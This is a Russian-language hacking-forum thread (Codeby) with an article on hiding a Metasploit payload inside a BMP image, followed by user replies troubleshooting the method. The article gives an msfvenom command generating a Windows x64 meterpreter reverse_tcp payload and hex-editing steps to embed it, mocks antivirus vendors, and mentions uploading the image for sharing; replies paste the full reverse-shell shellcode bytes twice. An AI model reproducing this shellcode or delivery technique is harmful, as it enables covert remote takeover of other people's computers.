• Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Статья Злая КАРТИНКА Payload

Всем привет! сегодня я с Вами по делюсь техникой доставки пэйлода не обычным образом а именно через картинку!
Ибо решил я застолбить эту методику первым на русско-говорящем пространстве и кстати приятно читать свои статьи на ХАК-бордах))) Собсна хочу обратится к копиастерам увожаемые Вы хоть источник указывайте где взяли инструкции, а то люди у вас интересуются по подробностям ну, а Вы в свою очередь их игнорите так-как не знаете всех ньансов моих методик!
Приступим, нам понадобится фотошоп по желанию, программа paint эта утилита есть по умолчанию в винде! И великий и могучий "ДРАКОН" kali-linux в нем и сгенерим наш пэйлоад командой:
msfvenom --platform windows --arch x64 -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.2 -f num > payload.txt

1.png


как видите у нас получился пэйлод размером 510 байт! Открываем его в текст. редакторе, убираем лишнее с помощью "найти и заменить"

2.png


3.png


4.png

Далее открываем Пайнт в винде и создаем файл .bmp 24-разрядный, размером: длинна 700 высота 2 в пикселях!

Screenshot_8.png



переносим его в кали и открываем утилитой hexeditor : hexeditor <name>.bat
копируем наш сгенереный текст в hex-код картинки!

5.png


6.png

7.png

8.png

смотрим и видим что наша нагрузка успешно телепортировалась в картинку)) Далее я проявил креатив и позитиу, скрестил его в фотошопе с моей "иконой"

Screenshot_9.png

Screenshot_10.png

Screenshot_11.png

Screenshot_12.png


Screenshot_13.png


Следущее что я сделал загрузил свою "злую" картинку на какой то сервак)) то есть на общий доступ.

9.png


допишу как освобожксь... в хату ломится отдел "К")) Колян.. по кличке "сан-техник" Окрестили Мы его так потому что он в молодости ограбил склад с сантехникой, ох как мы тогда гуляли мммм..... как Боги)))

ПС Хочу передать горячий и пламенный привет, труженникам антивирусных компаний смотрите так ребятки, не за брызгайте желчью свои экраны!))))))

продолжение следует!
 
Последнее редактирование:

Chelskiy

One Level
02.01.2017
4
7
BIT
0
7.png на данном скрине видно, что ты вставил сгенереный текст в hex-код картинки в самое начало. Если так сделать то картинка не откроется, возможно нужно вставлять код вот так? 1231.png если так сделать то картинка открывается...
 
  • Нравится
Реакции: BuTaluK

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 187
BIT
0
зря вы так... я вот в этом человеке под ником jaguar увидел темные нотки явно не доброго желания овладеть знаниями, и возможно он с таким целеустремлением станет лидером Российского хакерского движения и мне кажется я понял по чему он выбрал именно зеленый цвет так как он на подсознательном уровне является олдскульным хакерским цветом, вспомните матрицу!
 
B

BuTaluK

Ну чтож, я сделал такую "интиресную" картинку, и прогнал через Virus Total.
 

Вложения

  • Снимок экрана в 2017-07-07 12-36-26.png
    Снимок экрана в 2017-07-07 12-36-26.png
    74 КБ · Просмотры: 458
  • Снимок экрана в 2017-07-07 12-36-18.png
    Снимок экрана в 2017-07-07 12-36-18.png
    77,8 КБ · Просмотры: 318
  • Снимок экрана в 2017-07-07 12-35-44.png
    Снимок экрана в 2017-07-07 12-35-44.png
    71,1 КБ · Просмотры: 367
  • Снимок экрана в 2017-07-07 12-35-28.png
    Снимок экрана в 2017-07-07 12-35-28.png
    48,6 КБ · Просмотры: 677
  • Нравится
Реакции: ghost и Ondrik8

viktorcruce

Green Team
19.12.2016
28
5
BIT
0
поугарал на коментами ) А что то статья копипастом попахивает)
ТС признавайся скопипастил тему или сам дошел до этого)?
 

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 187
BIT
0
поугарал на коментами ) А что то статья копипастом попахивает)
ТС признавайся скопипастил тему или сам дошел до этого)?
конечно копипаст! но не с русскоговорящего ресурса методику проверял около недели и написал статью со своими скринами и текстом и я в начале указал что хочу за столбить метод на русскоговорящем пространстве.. и т.д.
 
  • Нравится
Реакции: valerian38 и Vander

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 187
BIT
0
два года назад была такая тема как стегосплоит(тот еще квест переводить с английского) метод примерно как у топикстартера но у тп как-то нюансы отличаются
да, была такая методика, она не нова!
 
  • Нравится
Реакции: Vander

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 187
BIT
0
Так же были годами раньше уязвимости в библиотеках по обработке разных форматов изображений в винде что то мне подсказывает что они некуда не делись а всего лишь изменили логику исполнения да и факеапдейт запихнуть можно)))))))))
все новое хорошо забытое старое!)) ничто так просто никуда не девается методы исполнения только меняются но концепция остается..
в этом я лично уже давно убедился.... таким же методом можно и через BSSID пэйлод передавать главное что бы активатор был на стороне жертвы да и не только через него АРП ДНС и т.д.
 
  • Нравится
Реакции: ghost

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 187
BIT
0
Ты только завязывай палить контору приложений с повышенными привелегиями))))))))))))
как скажешь))) блин написал статью "Ионная пушка" передача пэйлода по средствам wi-fi не зависимо подключена ли машина к точке или нет, да видно не судьба.... выйдет позже.. или под лютым хайдом)
 
J

jaguar

Всем привет !!! Поменял но результат код не полностью покрывает как в картинке. Чем нужно прежде вставить hexeditor обработать код чтоб он правильно вместился полностью?

EKRANAOT2017-07-0802-26-432afc0.png


EKRANAOT2017-07-0803-07-3866b2a.png

 

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 187
BIT
0
Всем привет !!! Поменял но результат код не полностью покрывает как в картинке. Чем нужно прежде вставить hexeditor обработать код чтоб он правильно вместился полностью?

EKRANAOT2017-07-0802-26-432afc0.png


EKRANAOT2017-07-0803-07-3866b2a.png

блокнотом функцией "найти и заменить"
 
J

jaguar

я это сделал но после вставки кода он съехал

fc, 48, 83, e4, f0, e8, cc, 00, 00, 00, 41, 51, 41, 50, 52,
51, 56, 48, 31, d2, 65, 48, 8b, 52, 60, 48, 8b, 52, 18, 48,
8b, 52, 20, 48, 8b, 72, 50, 48, 0f, b7, 4a, 4a, 4d, 31, c9,
48, 31, c0, ac, 3c, 61, 7c, 02, 2c, 20, 41, c1, c9, 0d, 41,
01, c1, e2, ed, 52, 41, 51, 48, 8b, 52, 20, 8b, 42, 3c, 48,
01, d0, 66, 81, 78, 18, 0b, 02, 0f, 85, 72, 00, 00, 00, 8b,
80, 88, 00, 00, 00, 48, 85, c0, 74, 67, 48, 01, d0, 50, 8b,
48, 18, 44, 8b, 40, 20, 49, 01, d0, e3, 56, 48, ff, c9, 41,
8b, 34, 88, 48, 01, d6, 4d, 31, c9, 48, 31, c0, ac, 41, c1,
c9, 0d, 41, 01, c1, 38, e0, 75, f1, 4c, 03, 4c, 24, 08, 45,
39, d1, 75, d8, 58, 44, 8b, 40, 24, 49, 01, d0, 66, 41, 8b,
0c, 48, 44, 8b, 40, 1c, 49, 01, d0, 41, 8b, 04, 88, 48, 01,
d0, 41, 58, 41, 58, 5e, 59, 5a, 41, 58, 41, 59, 41, 5a, 48,
83, ec, 20, 41, 52, ff, e0, 58, 41, 59, 5a, 48, 8b, 12, e9,
4b, ff, ff, ff, 5d, 49, be, 77, 73, 32, 5f, 33, 32, 00, 00,
41, 56, 49, 89, e6, 48, 81, ec, a0, 01, 00, 00, 49, 89, e5,
49, bc, 02, 00, 11, 5c, c0, a8, 00, 02, 41, 54, 49, 89, e4,
4c, 89, f1, 41, ba, 4c, 77, 26, 07, ff, d5, 4c, 89, ea, 68,
01, 01, 00, 00, 59, 41, ba, 29, 80, 6b, 00, ff, d5, 6a, 05,
41, 5e, 50, 50, 4d, 31, c9, 4d, 31, c0, 48, ff, c0, 48, 89,
c2, 48, ff, c0, 48, 89, c1, 41, ba, ea, 0f, df, e0, ff, d5,
48, 89, c7, 6a, 10, 41, 58, 4c, 89, e2, 48, 89, f9, 41, ba,
99, a5, 74, 61, ff, d5, 85, c0, 74, 0a, 49, ff, ce, 75, e5,
e8, 93, 00, 00, 00, 48, 83, ec, 10, 48, 89, e2, 4d, 31, c9,
6a, 04, 41, 58, 48, 89, f9, 41, ba, 02, d9, c8, 5f, ff, d5,
83, f8, 00, 7e, 55, 48, 83, c4, 20, 5e, 89, f6, 6a, 40, 41,
59, 68, 00, 10, 00, 00, 41, 58, 48, 89, f2, 48, 31, c9, 41,
ba, 58, a4, 53, e5, ff, d5, 48, 89, c3, 49, 89, c7, 4d, 31,
c9, 49, 89, f0, 48, 89, da, 48, 89, f9, 41, ba, 02, d9, c8,
5f, ff, d5, 83, f8, 00, 7d, 28, 58, 41, 57, 59, 68, 00, 40,
00, 00, 41, 58, 6a, 00, 5a, 41, ba, 0b, 2f, 0f, 30, ff, d5,
57, 59, 41, ba, 75, 6e, 4d, 61, ff, d5, 49, ff, ce, e9, 3c,
ff, ff, ff, 48, 01, c3, 48, 29, c6, 48, 85, f6, 75, b4, 41,
ff, e7, 58, 6a, 00, 59, 49, c7, c2, f0, b5, a2, 56, ff, d5
 

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 187
BIT
0
я это сделал но после вставки кода он съехал

fc, 48, 83, e4, f0, e8, cc, 00, 00, 00, 41, 51, 41, 50, 52,
51, 56, 48, 31, d2, 65, 48, 8b, 52, 60, 48, 8b, 52, 18, 48,
8b, 52, 20, 48, 8b, 72, 50, 48, 0f, b7, 4a, 4a, 4d, 31, c9,
48, 31, c0, ac, 3c, 61, 7c, 02, 2c, 20, 41, c1, c9, 0d, 41,
01, c1, e2, ed, 52, 41, 51, 48, 8b, 52, 20, 8b, 42, 3c, 48,
01, d0, 66, 81, 78, 18, 0b, 02, 0f, 85, 72, 00, 00, 00, 8b,
80, 88, 00, 00, 00, 48, 85, c0, 74, 67, 48, 01, d0, 50, 8b,
48, 18, 44, 8b, 40, 20, 49, 01, d0, e3, 56, 48, ff, c9, 41,
8b, 34, 88, 48, 01, d6, 4d, 31, c9, 48, 31, c0, ac, 41, c1,
c9, 0d, 41, 01, c1, 38, e0, 75, f1, 4c, 03, 4c, 24, 08, 45,
39, d1, 75, d8, 58, 44, 8b, 40, 24, 49, 01, d0, 66, 41, 8b,
0c, 48, 44, 8b, 40, 1c, 49, 01, d0, 41, 8b, 04, 88, 48, 01,
d0, 41, 58, 41, 58, 5e, 59, 5a, 41, 58, 41, 59, 41, 5a, 48,
83, ec, 20, 41, 52, ff, e0, 58, 41, 59, 5a, 48, 8b, 12, e9,
4b, ff, ff, ff, 5d, 49, be, 77, 73, 32, 5f, 33, 32, 00, 00,
41, 56, 49, 89, e6, 48, 81, ec, a0, 01, 00, 00, 49, 89, e5,
49, bc, 02, 00, 11, 5c, c0, a8, 00, 02, 41, 54, 49, 89, e4,
4c, 89, f1, 41, ba, 4c, 77, 26, 07, ff, d5, 4c, 89, ea, 68,
01, 01, 00, 00, 59, 41, ba, 29, 80, 6b, 00, ff, d5, 6a, 05,
41, 5e, 50, 50, 4d, 31, c9, 4d, 31, c0, 48, ff, c0, 48, 89,
c2, 48, ff, c0, 48, 89, c1, 41, ba, ea, 0f, df, e0, ff, d5,
48, 89, c7, 6a, 10, 41, 58, 4c, 89, e2, 48, 89, f9, 41, ba,
99, a5, 74, 61, ff, d5, 85, c0, 74, 0a, 49, ff, ce, 75, e5,
e8, 93, 00, 00, 00, 48, 83, ec, 10, 48, 89, e2, 4d, 31, c9,
6a, 04, 41, 58, 48, 89, f9, 41, ba, 02, d9, c8, 5f, ff, d5,
83, f8, 00, 7e, 55, 48, 83, c4, 20, 5e, 89, f6, 6a, 40, 41,
59, 68, 00, 10, 00, 00, 41, 58, 48, 89, f2, 48, 31, c9, 41,
ba, 58, a4, 53, e5, ff, d5, 48, 89, c3, 49, 89, c7, 4d, 31,
c9, 49, 89, f0, 48, 89, da, 48, 89, f9, 41, ba, 02, d9, c8,
5f, ff, d5, 83, f8, 00, 7d, 28, 58, 41, 57, 59, 68, 00, 40,
00, 00, 41, 58, 6a, 00, 5a, 41, ba, 0b, 2f, 0f, 30, ff, d5,
57, 59, 41, ba, 75, 6e, 4d, 61, ff, d5, 49, ff, ce, e9, 3c,
ff, ff, ff, 48, 01, c3, 48, 29, c6, 48, 85, f6, 75, b4, 41,
ff, e7, 58, 6a, 00, 59, 49, c7, c2, f0, b5, a2, 56, ff, d5
пробелы убери! после запятых!))
 
J

jaguar

Да спасибо пробел убрал только вдоль цифры пошли

EKRANAOT2017-07-0804-15-484fda2.png
 
J

jaguar

Посмотрел твои скрины у меня не получается код при попадания на
hexeditor в самом изображении становиться не полностью а отрывками.
5-png.10650


fc,48,83,e4,f0,e8,cc,00,00,00,41,51,41,50,52,
51,56,48,31,d2,65,48,8b,52,60,48,8b,52,18,48,
8b,52,20,48,8b,72,50,48,0f,b7,4a,4a,4d,31,c9,
48,31,c0,ac,3c,61,7c,02,2c,20,41,c1,c9,0d,41,
01,c1,e2,ed,52,41,51,48,8b,52,20,8b,42,3c,48,
01,d0,66,81,78,18,0b,02,0f,85,72,00,00,00,8b,
80,88,00,00,00,48,85,c0,74,67,48,01,d0,50,8b,
48,18,44,8b,40,20,49,01,d0,e3,56,48,ff,c9,41,
8b,34,88,48,01,d6,4d,31,c9,48,31,c0,ac,41,c1,
c9,0d,41,01,c1,38,e0,75,f1,4c,03,4c,24,08,45,
39,d1,75,d8,58,44,8b,40,24,49,01,d0,66,41,8b,
0c,48,44,8b,40,1c,49,01,d0,41,8b,04,88,48,01,
d0,41,58,41,58,5e,59,5a,41,58,41,59,41,5a,48,
83,ec,20,41,52,ff,e0,58,41,59,5a,48,8b,12,e9,
4b,ff,ff,ff,5d,49,be,77,73,32,5f,33,32,00,00,
41,56,49,89,e6,48,81,ec,a0,01,00,00,49,89,e5,
49,bc,02,00,11,5c,c0,a8,00,02,41,54,49,89,e4,
4c,89,f1,41,ba,4c,77,26,07,ff,d5,4c,89,ea,68,
01,01,00,00,59,41,ba,29,80,6b,00,ff,d5,6a,05,
41,5e,50,50,4d,31,c9,4d,31,c0,48,ff,c0,48,89,
c2,48,ff,c0,48,89,c1,41,ba,ea,0f,df,e0,ff,d5,
48,89,c7,6a,10,41,58,4c,89,e2,48,89,f9,41,ba,
99,a5,74,61,ff,d5,85,c0,74,0a,49,ff,ce,75,e5,
e8,93,00,00,00,48,83,ec,10,48,89,e2,4d,31,c9,
6a,04,41,58,48,89,f9,41,ba,02,d9,c8,5f,ff,d5,
83,f8,00,7e,55,48,83,c4,20,5e,89,f6,6a,40,41,
59,68,00,10,00,00,41,58,48,89,f2,48,31,c9,41,
ba,58,a4,53,e5,ff,d5,48,89,c3,49,89,c7,4d,31,
c9,49,89,f0,48,89,da,48,89,f9,41,ba,02,d9,c8,
5f,ff,d5,83,f8,00,7d,28,58,41,57,59,68,00,40,
00,00,41,58,6a,00,5a,41,ba,0b,2f,0f,30,ff,d5,
57,59,41,ba,75,6e,4d,61,ff,d5,49,ff,ce,e9,3c,
ff,ff,ff,48,01,c3,48,29,c6,48,85,f6,75,b4,41,
ff,e7,58,6a,00,59,49,c7,c2,f0,b5,a2,56,ff,d5
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!